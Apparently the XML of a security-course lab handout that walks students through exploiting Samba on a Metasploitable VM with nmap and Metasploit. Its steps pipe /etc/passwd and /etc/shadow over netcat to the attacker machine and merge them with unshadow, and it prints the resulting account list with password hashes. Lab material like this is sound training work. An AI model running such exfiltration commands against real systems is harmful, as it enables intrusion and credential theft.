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8aff1537dee8cd5504365d81fd81042ba964354"/>
      <w:r>
        <w:t xml:space="preserve">Lab 7 - Exploiting Samba and Exfiltrating Data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target IP: 172.16.0.22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Target: Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run nmap against the metasploitable machine using the following command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udo nmap -sV &lt;metasploitable IP&gt; -vvv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(make a note of open ports and services).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">make a note of what port Samba is running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└─$ sudo nmap -sV 172.16.0.22 -vvv | grep Samba  139/tcp  open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  445/tcp  open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On your Kali machine launch the metasploit framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Search for Samba exploits based on version identified in nmap results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msf6&gt; search type:exploit name:samba</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select the exploit matching the version (note that the search option may not provide a lot of information so you will likely have to try multiple exploits to make it work).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select the exploit by using command below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use exploit/xxxxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set required options by using set command (hint RHOSTS, and possibly payload).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execute the exploit (this should open a session on the exploited host).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open another Kali terminal window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch netcat in a listen mode and redirect output to a file as shown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nc -l -p 4567 &gt; passwd.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the exploited system terminal (session opened from metasploit exploit you executed) type the following commands to extract the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t /etc/passwd | nc &lt;kali ip&gt; 4567</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(there will be no progress bar and there should be no error messages).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">go back to the listening netcat window and terminate it using CTRL+C. Cat the contents of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file using command below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t passwd.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start another</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">command but redirect the contents to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shadow.tx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asswd.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(use the same command as in Step 9 just change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd.tx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hadow.txt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From the exploited system terminal (session opened from metasploit exploit you executed) type the following commands to extract the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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t /etc/shadow| nc &lt;kali ip&gt; 4567</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(there will be no progress bar and there should be no error messages).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">go back to the listening netcat window and terminate it using CTRL+C. Cat the contents of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file using command below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t shadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On your kali box combine the contents of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd.t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hadow.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">using the command below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unshadow passwd.txt shadow.txt &gt; user_logins.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What is the content of the combined</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_logins.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file (include screenshot)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root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/bin/sh bin:*:2:2:bin:/bin:/bin/sh sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/bin/sh man:*:6:12:man:/var/cache/man:/bin/sh lp:*:7:7:lp:/var/spool/lpd:/bin/sh mail:*:8:8:mail:/var/mail:/bin/sh news:*:9:9:news:/var/spool/news:/bin/sh uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh proxy:*:13:13:proxy:/bin:/bin/sh www-data:*:33:33:www-data:/var/www:/bin/sh backup:*:34:34:backup:/var/backups:/bin/sh list:*:38:38:Mailing List Manager:/var/list:/bin/sh irc:*:39:39:ircd:/var/run/ircd:/bin/sh gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:*:65534:65534:nobody:/nonexistent:/bin/sh libuuid:!:100:101::/var/lib/libuuid:/bin/sh dhcp:*:101:102::/nonexistent:/bin/false syslog:*:102:103::/home/syslog:/bin/false klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false sshd:*:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:*:105:113::/var/cache/bind:/bin/false postfix:*:106:115::/var/spool/postfix:/bin/false ftp:*:107:65534::/home/ftp:/bin/false postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:!:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:*:110:65534::/usr/share/tomcat5.5:/bin/false distccd:*:111:65534::/:/bin/false user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash telnetd:*:112:120::/nonexistent:/bin/false proftpd:!:113:65534::/var/run/proftpd:/bin/false statd:*:114:65534::/var/lib/nfs:/bin/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9T03:03:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-09T03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